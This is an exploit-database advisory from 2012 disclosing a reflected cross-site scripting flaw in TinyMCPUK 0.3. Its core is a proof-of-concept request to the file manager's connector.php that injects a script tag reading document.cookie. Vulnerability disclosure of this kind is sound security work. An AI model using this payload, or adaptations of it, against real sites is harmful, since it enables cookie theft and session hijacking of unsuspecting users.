Tinymcpuk 0.3 Cross Site Scripting

2012-12-01T00:00:00
ID PACKETSTORM:118536
Type packetstorm
Reporter eidelweiss
Modified 2012-12-01T00:00:00

Description

                                        
                                            `=================================================================  
tinymcpuk xss vulnerability  
=================================================================  
  
# Exploit Title: tinymcpuk xss vulnerability  
# Google Dork: n/a  
# Date: 1/12/2012 (GMT+7)  
# Exploit Author: eidelweiss (@randyarios)  
# Vendor Homepage: http://sourceforge.net/projects/p4a/files/tinymcpuk/  
# Software Link: http://sourceforge.net/projects/p4a/files/tinymcpuk/0.3/  
# Version: 0.3  
# Tested on: windows & Ubuntu Linux  
  
  
[!] about  
  
TinyMCPUK - TinyMCE with file/image manager.  
TinyMCPUK brings you the powerful TinyMCE plus  
the MCPUK file manager and ImageManager  
strictly integrated together.  
  
[!] exploit & p0c  
  
/tinymcpuk/filemanager/connectors/php/connector.php?test=<h1>p0c</h1>&xss=<script>alert(document.cookie)</script>  
  
[!] sample poc  
  
http://host/filemanager/connectors/php/connector.php?test=<h1>p0c</h1>&xss=<script>alert(document.cookie)</script>  
  
  
==========================| -=[ E0F ]=- |==========================  
  
Nb: Graatz to om wenk and all DC member.. sorry om Suntuk banget gue wkakwakwkawk.. bavod!!!  
  
`